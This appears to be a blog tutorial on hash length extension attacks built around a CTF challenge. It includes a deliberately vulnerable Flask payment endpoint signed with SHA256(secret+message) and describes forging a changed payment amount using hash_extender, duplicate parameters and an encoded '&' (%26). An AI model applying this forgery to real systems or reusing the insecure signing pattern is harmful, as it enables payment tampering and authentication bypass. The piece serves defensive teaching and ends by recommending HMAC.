Understanding Length Extension Attacks

2 days ago 13

BOOK THIS SPACE FOR AD

ARTICLE AD

In many real-world penetration tests, black-box testing limits your ability to see what’s happening under the hood. Without access to the source code, it’s difficult to fully understand an application’s internal logic, security controls, and more complex vulnerabilities. Yet, some of the most critical and fascinating security flaws are hidden within the source code and remain harder to detect through black-box testing alone.

Today, I’ll be discussing one such vulnerability — Length Extension attacks. To help illustrate this attack in a hands-on way, I’ve created a CTF challenge, which is available on my GitHub page if you’d like to follow along.

https://github.com/mroyx/length-extension-ctf

Length Extension attacks target hash functions like MD5, SHA-1, and SHA-256 that follow the Merkle-Damgård construction. These functions leak internal state in their final output, allowing attackers to extend a hashed message and compute a valid hash for the modified input.

If the attacker can guess the length of the secret, they can forge messages that pass verification checks. This can lead to authentication bypasses, tampering, and other security flaws in systems that use insecure hash functions for integrity or signature checks.

hash_extender is a command-line utility created by Ron Bowes to simplify the process of performing length extension attacks. Instead of manually reconstructing the internal state of a hash function or calculating padding by hand, this tool automates everything.

To use it, you provide the original hash, the known portion of the message, the length of the secret key, and the data you want to append. The tool then generates a new valid hash for the extended input.

You can find the tool available on GitHub:

https://github.com/iagox86/hash_extender

To demonstrate, let’s say Alice sends Bob the following message:

Hi, Bob. Please approve the transaction.

To ensure authenticity, she signs it using SHA256 (secret + message), resulting in the following hash:

Eve intercepts the message and hash. While she doesn’t know the secret key, she does know its length, which is enough to exploit the hash function’s structure. She appends:

And don’t forget to send $5,000 to Eve.

Eve’s able to forge a new message and compute a valid hash that would pass verification — as if it had been signed by Alice herself.

The decoded message can be seen below.

Hi Bob, please approve the transaction.�� And also don’t forget to send $5,000 to Eve.

It’s important to note that the � replacement characters appear due to padding bytes inserted during the hashing process. These are not part of the original or appended messages — they’re required by the hash function to process input correctly and are what make the attack possible.

To confirm the attack worked, we can prepend the secret and recompute the hash. The resulting hash matches the forged one generated by hash_extender, proving that the new message passes verification successfully. The screenshot below demonstrates this.

To demonstrate a more practical example, consider the following code:

@app.route('/process_payment', methods=['POST'])
def process_payment():
transaction_id = request.form.get("transaction_id")
amount = request.form.get("amount")
received_sign = request.form.get("sign")

request_body = f"transaction_id={transaction_id}&amount={amount}"
expected_sign = generate_hash(request_body)

if received_sign != expected_sign:
return jsonify(success=False, error="Invalid signature — possible tampering detected!"), 403

def generate_hash(request_body):
hash_input = (SECRET_KEY + request_body).encode()
return hashlib.sha256(hash_input).hexdigest()

The transaction is signed using a secret key that is unknown to the attacker. The transaction is then verified to prevent tampering. Therefore, if an attacker tries to modify any of the request parameters, the signature becomes invalid, causing the request to fail, as shown in the screenshots below.

This verification seems like it should be secure since any modification to the request would result in a signature mismatch, preventing unauthorized changes. However, the vulnerability lies in how the signature is generated — using a hash function that is vulnerable to a length extension attack. This allows an attacker to forge a valid signature for a modified request, without knowing the secret key.

To effectively exploit this attack, an attacker could manipulate the appended data so that it gets processed by the server. For instance, they could send a duplicate request parameter along with a newly generated signature. If the server processes the attacker’s parameter for execution while still using the original parameter for signature validation, the attack succeeds.

However, different programming languages and libraries handle duplicate request parameters inconsistently — some return the first occurrence, while others return the last. For example, the code samples and output below demonstrate how Django and Flask interpret duplicate parameters differently — one returns the first occurrence, the other the last.

from django.http import JsonResponse

def show_parameters(request):
param = request.GET.get('parameter')
return JsonResponse({
"parameter": param,
})

from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route('/test')
def show_parameters():
param = request.args.get('parameter')
return jsonify({
"parameter": param
})

if __name__ == '__main__':
app.run(port=5000, debug=True)

Since the original data is used to create the signature, this data must also be included in the modified request. In other words, the application must process both parameters but use the duplicate value for execution while keeping the original value for signature validation.

Another challenge when executing this attack is handling the padding byte. Many hash functions use it as part of their padding scheme, but \x80 is not a valid UTF-8 character. When included in a request, it often gets decoded as a replacement character (�) , which alters the message and breaks the hash comparison. As a result, the server fails to reproduce the original hash, causing the attack to fail even if the vulnerability is present.

To better help demonstrate this issue, a payload was generated using hash_extender based on the previous request details above.

The payload was then sent to the server.

The Flask server log revealed that the padding byte did not decode correctly, resulting in a mismatched hash and ultimately causing the attack to fail.

As an alternative, we can try sending our payload as raw bytes. Hashing algorithms process both raw bytes and string representations the same way, and we can verify this with the following example:

However, the attack again fails. As shown in the screenshot below, Flask automatically escapes forward slashes, altering the input and resulting in an incorrect hash calculation. This prevents the attack from succeeding.

While these encoding issues introduce additional challenges to the attack, it’s important to note that some character encodings do interpret \x80, and not all web servers escape forward slashes by default. Therefore, under certain circumstances, attackers may still be able to exploit this vulnerability despite the added complexity. Therefore, to fully demonstrate the vulnerability, I’ve modified the source code in the CTF challenge I created to automatically URL-decode %80.

After updating the source code, the same payload was sent — but the attack still failed.

The server log shows that Flask is now correctly decoding the padding byte, so we need to take a closer look at why the attack is not working.

To fully grasp why this vulnerability works — and why it can fail — it’s important to fully understand how the signature is generated and how input is processed on the backend. Without access to the source code, this can be challenging.

In our case, the transactionid and cost parameters are concatenated with a secret key and then hashed. The server verifies the request by comparing the hash, which helps detect tampering.

The attack fails initially because we’re sending two cost parameters, and Flask (by default) uses only the first occurrence. This mismatch leads to an incorrect hash calculation.

To bypass this, we can URL-encode the & character that separates transactionid and the first cost parameter. This tricks the backend into interpreting the entire string as part of a single transactionid value — preserving the original cost used in the hash calculation.

When the request body is decoded on the server, %26 is interpreted as &. This doesn’t affect the original signature, but it prevents the server from recognizing it as a separate, duplicate parameter. As a result, the original cost value used in the hash remains intact, while the attacker’s value is processed during execution. This allows the hash to remain valid, and the attack succeeds — as shown below:

Length extension attacks highlight how subtle cryptographic design choices can introduce powerful vulnerabilities. While the concept behind the attack is relatively simple, successfully pulling it off in practice requires a deep understanding of how an application processes input, handles encoding, and generates hashes.

From estimating the secret key’s length to navigating character encoding quirks and web framework behavior, each step presents a new challenge. That complexity is what makes this attack so compelling — it’s not just about exploiting a bug, but about aligning many moving parts to take advantage of a very specific weakness.

Unlike common web vulnerabilities, length extension attacks depend on narrow and well-defined conditions, which is why they’re often missed in typical black-box testing. But by dissecting each layer of the exploit and recreating the exact environment it needs, we gain a clearer understanding of cryptographic internals — and a stronger appreciation for using secure primitives like HMAC in modern applications.

If you have any thoughts, questions, or suggestions for improvement, I’d be happy to hear them. Thank you for reading!

Read Entire Article